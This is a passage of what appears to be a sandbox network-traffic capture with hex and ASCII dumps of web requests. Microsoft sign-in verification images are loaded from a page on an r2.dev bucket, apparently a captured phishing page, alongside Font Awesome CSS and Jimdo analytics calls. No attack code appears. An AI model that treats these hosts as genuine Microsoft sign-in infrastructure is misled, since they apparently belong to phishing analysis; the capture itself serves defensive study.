of 4.4.0 */.pull-right { float: right;}.pull-left { float: left;}.fa.pull-left { margin-right: .3em;}.fa.pull-right { margin-left: .3em;}.fa-spin { -webkit-animation: fa-spin 2s infinite linear; animation: fa-sp
2024-04-18 17:39:21 UTC	1369	IN	Data Raw: 20 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 30 2c 20 6d 69 72 72 6f 72 3d 31 29 22 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 2d 31 2c 20 31 29 3b 0a 20 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 2d 31 2c 20 31 29 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 2d 31 2c 20 31 29 3b 0a 7d 0a 2e 66 61 2d 66 6c 69 70 2d 76 65 72 74 69 63 61 6c 20 7b 0a 20 20 2d 6d 73 2d 66 69 6c 74 65 72 3a 20 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d Data Ascii: "progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)"; -webkit-transform: scale(-1, 1); -ms-transform: scale(-1, 1); transform: scale(-1, 1);}.fa-flip-vertical { -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=
2024-04-18 17:39:21 UTC	1369	IN	Data Raw: 2d 6c 61 72 67 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 39 22 3b 0a 7d 0a 2e 66 61 2d 74 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 61 22 3b 0a 7d 0a 2e 66 61 2d 74 68 2d 6c 69 73 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 62 22 3b 0a 7d 0a 2e 66 61 2d 63 68 65 63 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 63 22 3b 0a 7d 0a 2e 66 61 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 63 6c 6f 73 65 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 74 69 6d 65 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 64 22 3b 0a 7d 0a 2e 66 61 2d 73 65 61 72 63 68 2d 70 6c 75 73 3a 62 Data Ascii: -large:before { content: "\f009";}.fa-th:before { content: "\f00a";}.fa-th-list:before { content: "\f00b";}.fa-check:before { content: "\f00c";}.fa-remove:before,.fa-close:before,.fa-times:before { content: "\f00d";}.fa-search-plus:b
2024-04-18 17:39:21 UTC	1369	IN	Data Raw: 74 65 6e 74 3a 20 22 5c 66 30 32 39 22 3b 0a 7d 0a 2e 66 61 2d 62 61 72 63 6f 64 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 61 22 3b 0a 7d 0a 2e 66 61 2d 74 61 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 62 22 3b 0a 7d 0a 2e 66 61 2d 74 61 67 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 63 22 3b 0a 7d 0a 2e 66 61 2d 62 6f 6f 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 64 22 3b 0a 7d 0a 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 65 22 3b 0a 7d 0a 2e 66 61 2d 70 72 69 6e 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c Data Ascii: tent: "\f029";}.fa-barcode:before { content: "\f02a";}.fa-tag:before { content: "\f02b";}.fa-tags:before { content: "\f02c";}.fa-book:before { content: "\f02d";}.fa-bookmark:before { content: "\f02e";}.fa-print:before { content: "\
2024-04-18 17:39:21 UTC	1369	IN	Data Raw: 74 65 70 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 38 22 3b 0a 7d 0a 2e 66 61 2d 66 61 73 74 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 39 22 3b 0a 7d 0a 2e 66 61 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 61 22 3b 0a 7d 0a 2e 66 61 2d 70 6c 61 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 62 22 3b 0a 7d 0a 2e 66 61 2d 70 61 75 73 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 63 22 3b 0a 7d 0a 2e 66 61 2d 73 74 6f 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 64 22 3b Data Ascii: tep-backward:before { content: "\f048";}.fa-fast-backward:before { content: "\f049";}.fa-backward:before { content: "\f04a";}.fa-play:before { content: "\f04b";}.fa-pause:before { content: "\f04c";}.fa-stop:before { content: "\f04d";
2024-04-18 17:39:21 UTC	1369	IN	Data Raw: 6e 74 3a 20 22 5c 66 30 36 37 22 3b 0a 7d 0a 2e 66 61 2d 6d 69 6e 75 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 38 22 3b 0a 7d 0a 2e 66 61 2d 61 73 74 65 72 69 73 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 39 22 3b 0a 7d 0a 2e 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 61 22 3b 0a 7d 0a 2e 66 61 2d 67 69 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 62 22 3b 0a 7d 0a 2e 66 61 2d 6c 65 61 66 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 63 22 3b 0a 7d 0a 2e 66 61 2d 66 69 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 Data Ascii: nt: "\f067";}.fa-minus:before { content: "\f068";}.fa-asterisk:before { content: "\f069";}.fa-exclamation-circle:before { content: "\f06a";}.fa-gift:before { content: "\f06b";}.fa-leaf:before { content: "\f06c";}.fa-fire:before { c
2024-04-18 17:39:21 UTC	1369	IN	Data Raw: 66 61 2d 74 68 75 6d 62 73 2d 6f 2d 75 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 37 22 3b 0a 7d 0a 2e 66 61 2d 74 68 75 6d 62 73 2d 6f 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 38 22 3b 0a 7d 0a 2e 66 61 2d 73 74 61 72 2d 68 61 6c 66 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 39 22 3b 0a 7d 0a 2e 66 61 2d 68 65 61 72 74 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 61 22 3b 0a 7d 0a 2e 66 61 2d 73 69 67 6e 2d 6f 75 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 62 22 3b 0a 7d 0a 2e 66 61 2d 6c 69 6e 6b 65 64 69 6e 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b Data Ascii: fa-thumbs-o-up:before { content: "\f087";}.fa-thumbs-o-down:before { content: "\f088";}.fa-star-half:before { content: "\f089";}.fa-heart-o:before { content: "\f08a";}.fa-sign-out:before { content: "\f08b";}.fa-linkedin-square:before {
2024-04-18 17:39:21 UTC	1369	IN	Data Raw: 22 5c 66 30 61 36 22 3b 0a 7d 0a 2e 66 61 2d 68 61 6e 64 2d 6f 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 37 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 38 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 39 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 75 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 61 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e Data Ascii: "\f0a6";}.fa-hand-o-down:before { content: "\f0a7";}.fa-arrow-circle-left:before { content: "\f0a8";}.fa-arrow-circle-right:before { content: "\f0a9";}.fa-arrow-circle-up:before { content: "\f0aa";}.fa-arrow-circle-down:before { conten

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:21 UTC	684	OUT	GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:22 UTC	805	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 17:39:21 GMT Content-Type: image/svg+xml Content-Length: 199 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:39 GMT ETag: 0x8D79B8374CE7F93 x-ms-request-id: 85adcb71-e01e-0010-53a9-9155bc000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240418T173921Z-r1f585c6b65s6t5bg30nh02cq000000005ag000000009dx2 x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-18 17:39:22 UTC	199	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00 Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:22 UTC	438	OUT	GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:23 UTC	806	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 17:39:22 GMT Content-Type: image/svg+xml Content-Length: 2407 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 11 Mar 2022 11:11:29 GMT ETag: 0x8DA034FE445C10D x-ms-request-id: 7046efac-401e-0036-21b7-913e83000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240418T173922Z-15497cdd9fdrtvgd4t2mhqxwec00000000gg0000000166vk x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-18 17:39:23 UTC	2407	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04 Data Ascii: Y=s8mrfy8RlNkl?{$l\|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx\|\|y=/3kN2H;<sy

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:25 UTC	628	OUT	POST /anon HTTP/1.1 Host: at.prod.jimdo.systems Connection: keep-alive Content-Length: 425 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://doc-36.jimdosite.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://doc-36.jimdosite.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:25 UTC	425	OUT	Data Raw: 7b 22 6d 65 74 61 22 3a 22 7b 5c 22 6c 61 6e 67 75 61 67 65 5c 22 3a 5c 22 65 6e 5c 22 2c 5c 22 6c 6f 63 61 74 69 6f 6e 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 33 36 2e 6a 69 6d 64 6f 73 69 74 65 2e 63 6f 6d 2f 69 6d 70 72 69 6e 74 2f 5c 22 2c 5c 22 74 69 6d 65 53 70 65 6e 74 4f 6e 50 61 67 65 49 6e 4d 53 5c 22 3a 32 36 32 37 2c 5c 22 70 65 72 66 6f 72 6d 61 6e 63 65 5c 22 3a 7b 5c 22 64 6f 6d 49 6e 74 65 72 61 63 74 69 76 65 5c 22 3a 31 32 37 38 2c 5c 22 64 6f 6d 43 6f 6d 70 6c 65 74 65 5c 22 3a 31 33 31 32 2c 5c 22 66 63 70 5c 22 3a 39 38 31 2c 5c 22 6c 63 70 5c 22 3a 39 38 31 2c 5c 22 66 69 64 5c 22 3a 34 36 2c 5c 22 63 6c 73 5c 22 3a 30 7d 2c 5c 22 73 63 72 6f 6c 6c 44 65 70 74 68 5c 22 3a 30 2c 5c 22 72 65 66 65 72 72 65 72 5c 22 3a 5c 22 Data Ascii: {"meta":"{\"language\":\"en\",\"location\":\"https://doc-36.jimdosite.com/imprint/\",\"timeSpentOnPageInMS\":2627,\"performance\":{\"domInteractive\":1278,\"domComplete\":1312,\"fcp\":981,\"lcp\":981,\"fid\":46,\"cls\":0},\"scrollDepth\":0,\"referrer\":\"
2024-04-18 17:39:25 UTC	206	IN	HTTP/1.1 204 No Content Date: Thu, 18 Apr 2024 17:39:25 GMT Connection: close access-control-allow-origin: https://doc-36.jimdosite.com Strict-Transport-Security: max-age=15724800; includeSubDomains

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:26 UTC	628	OUT	POST /anon HTTP/1.1 Host: at.prod.jimdo.systems Connection: keep-alive Content-Length: 323 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://doc-36.jimdosite.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://doc-36.jimdosite.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:26 UTC	323	OUT	Data Raw: 7b 22 6d 65 74 61 22 3a 22 7b 5c 22 6c 61 6e 67 75 61 67 65 5c 22 3a 5c 22 65 6e 5c 22 2c 5c 22 6c 6f 63 61 74 69 6f 6e 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 33 36 2e 6a 69 6d 64 6f 73 69 74 65 2e 63 6f 6d 2f 63 6f 6f 6b 69 65 2d 73 65 74 74 69 6e 67 73 2f 5c 22 2c 5c 22 74 69 6d 65 53 70 65 6e 74 4f 6e 50 61 67 65 49 6e 4d 53 5c 22 3a 30 2c 5c 22 73 63 72 6f 6c 6c 44 65 70 74 68 5c 22 3a 30 2c 5c 22 72 65 66 65 72 72 65 72 5c 22 3a 5c 22 5c 22 2c 5c 22 6d 61 78 53 63 72 6f 6c 6c 44 65 70 74 68 5c 22 3a 30 2c 5c 22 71 75 65 72 79 5c 22 3a 7b 7d 2c 5c 22 61 75 74 6f 5c 22 3a 74 72 75 65 7d 22 2c 22 74 6f 70 69 63 22 3a 22 77 65 62 73 69 74 65 2e 70 61 67 65 2e 6c 6f 61 64 69 6e 67 22 2c 22 73 65 71 22 3a 30 2c 22 73 69 64 22 3a 22 31 37 31 33 Data Ascii: {"meta":"{\"language\":\"en\",\"location\":\"https://doc-36.jimdosite.com/cookie-settings/\",\"timeSpentOnPageInMS\":0,\"scrollDepth\":0,\"referrer\":\"\",\"maxScrollDepth\":0,\"query\":{},\"auto\":true}","topic":"website.page.loading","seq":0,"sid":"1713
2024-04-18 17:39:26 UTC	206	IN	HTTP/1.1 204 No Content Date: Thu, 18 Apr 2024 17:39:26 GMT Connection: close access-control-allow-origin: https://doc-36.jimdosite.com Strict-Transport-Security: max-age=15724800; includeSubDomains

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:27 UTC	628	OUT	POST /anon HTTP/1.1 Host: at.prod.jimdo.systems Connection: keep-alive Content-Length: 325 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://doc-36.jimdosite.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://doc-36.jimdosite.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:27 UTC	325	OUT	Data Raw: 7b 22 6d 65 74 61 22 3a 22 7b 5c 22 6c 61 6e 67 75 61 67 65 5c 22 3a 5c 22 65 6e 5c 22 2c 5c 22 6c 6f 63 61 74 69 6f 6e 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 33 36 2e 6a 69 6d 64 6f 73 69 74 65 2e 63 6f 6d 2f 63 6f 6f 6b 69 65 2d 73 65 74 74 69 6e 67 73 2f 5c 22 2c 5c 22 74 69 6d 65 53 70 65 6e 74 4f 6e 50 61 67 65 49 6e 4d 53 5c 22 3a 38 30 2c 5c 22 73 63 72 6f 6c 6c 44 65 70 74 68 5c 22 3a 30 2c 5c 22 72 65 66 65 72 72 65 72 5c 22 3a 5c 22 5c 22 2c 5c 22 6d 61 78 53 63 72 6f 6c 6c 44 65 70 74 68 5c 22 3a 30 2c 5c 22 71 75 65 72 79 5c 22 3a 7b 7d 2c 5c 22 61 75 74 6f 5c 22 3a 74 72 75 65 7d 22 2c 22 74 6f 70 69 63 22 3a 22 77 65 62 73 69 74 65 2e 70 61 67 65 2e 63 6f 6d 70 6c 65 74 65 22 2c 22 73 65 71 22 3a 33 2c 22 73 69 64 22 3a 22 31 37 Data Ascii: {"meta":"{\"language\":\"en\",\"location\":\"https://doc-36.jimdosite.com/cookie-settings/\",\"timeSpentOnPageInMS\":80,\"scrollDepth\":0,\"referrer\":\"\",\"maxScrollDepth\":0,\"query\":{},\"auto\":true}","topic":"website.page.complete","seq":3,"sid":"17
2024-04-18 17:39:27 UTC	206	IN	HTTP/1.1 204 No Content Date: Thu, 18 Apr 2024 17:39:27 GMT Connection: close access-control-allow-origin: https://doc-36.jimdosite.com Strict-Transport-Security: max-age=15724800; includeSubDomains

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:29 UTC	628	OUT	POST /anon HTTP/1.1 Host: at.prod.jimdo.systems Connection: keep-alive Content-Length: 420 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://doc-36.jimdosite.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://doc-36.jimdosite.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:29 UTC	420	OUT	Data Raw: 7b 22 6d 65 74 61 22 3a 22 7b 5c 22 6c 61 6e 67 75 61 67 65 5c 22 3a 5c 22 65 6e 5c 22 2c 5c 22 6c 6f 63 61 74 69 6f 6e 5c 22 3a 5c 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 33 36 2e 6a 69 6d 64 6f 73 69 74 65 2e 63 6f 6d 2f 63 6f 6f 6b 69 65 2d 73 65 74 74 69 6e 67 73 2f 5c 22 2c 5c 22 74 69 6d 65 53 70 65 6e 74 4f 6e 50 61 67 65 49 6e 4d 53 5c 22 3a 33 32 31 31 2c 5c 22 70 65 72 66 6f 72 6d 61 6e 63 65 5c 22 3a 7b 5c 22 64 6f 6d 49 6e 74 65 72 61 63 74 69 76 65 5c 22 3a 36 35 39 2c 5c 22 64 6f 6d 43 6f 6d 70 6c 65 74 65 5c 22 3a 36 37 35 2c 5c 22 66 63 70 5c 22 3a 35 32 35 2c 5c 22 6c 63 70 5c 22 3a 35 32 35 2c 5c 22 66 69 64 5c 22 3a 31 7d 2c 5c 22 73 63 72 6f 6c 6c 44 65 70 74 68 5c 22 3a 30 2c 5c 22 72 65 66 65 72 72 65 72 5c 22 3a 5c 22 5c 22 2c 5c 22 Data Ascii: {"meta":"{\"language\":\"en\",\"location\":\"https://doc-36.jimdosite.com/cookie-settings/\",\"timeSpentOnPageInMS\":3211,\"performance\":{\"domInteractive\":659,\"domComplete\":675,\"fcp\":525,\"lcp\":525,\"fid\":1},\"scrollDepth\":0,\"referrer\":\"\",\"
2024-04-18 17:39:29 UTC	206	IN	HTTP/1.1 204 No Content Date: Thu, 18 Apr 2024 17:39:29 GMT Connection: close access-control-allow-origin: https://doc-36.jimdosite.com Strict-Transport-Security: max-age=15724800; includeSubDomains

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:33 UTC	615	OUT	GET /ui/loader.js HTTP/1.1 Host: web.cmp.usercentrics.eu Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.jimdo.com/?utm_source=dol-doc-36%20en-US&utm_medium=footer%20ad&utm_campaign=ownads%20webview Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:33 UTC	932	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ABPtcPpoXurjo2juFDwG0-N9nl2JPOAlmpN-yH-cWDGc0NBEnYdxWFRfQIKHHPEk9e1lrFpPQEE Date: Thu, 18 Apr 2024 17:39:33 GMT Cache-Control: public, max-age=3600 Expires: Thu, 18 Apr 2024 18:39:33 GMT Last-Modified: Thu, 11 Apr 2024 08:55:29 GMT ETag: "bbbbf08a1ced327b0c22abad87aeb6f2" x-goog-generation: 1712825729385305 x-goog-metageneration: 2 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 5180 Content-Type: application/javascript x-goog-hash: crc32c=kMaLnw== x-goog-hash: md5=u7vwihztMnsMIquth6628g== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 5180 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Server: UploadServer Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
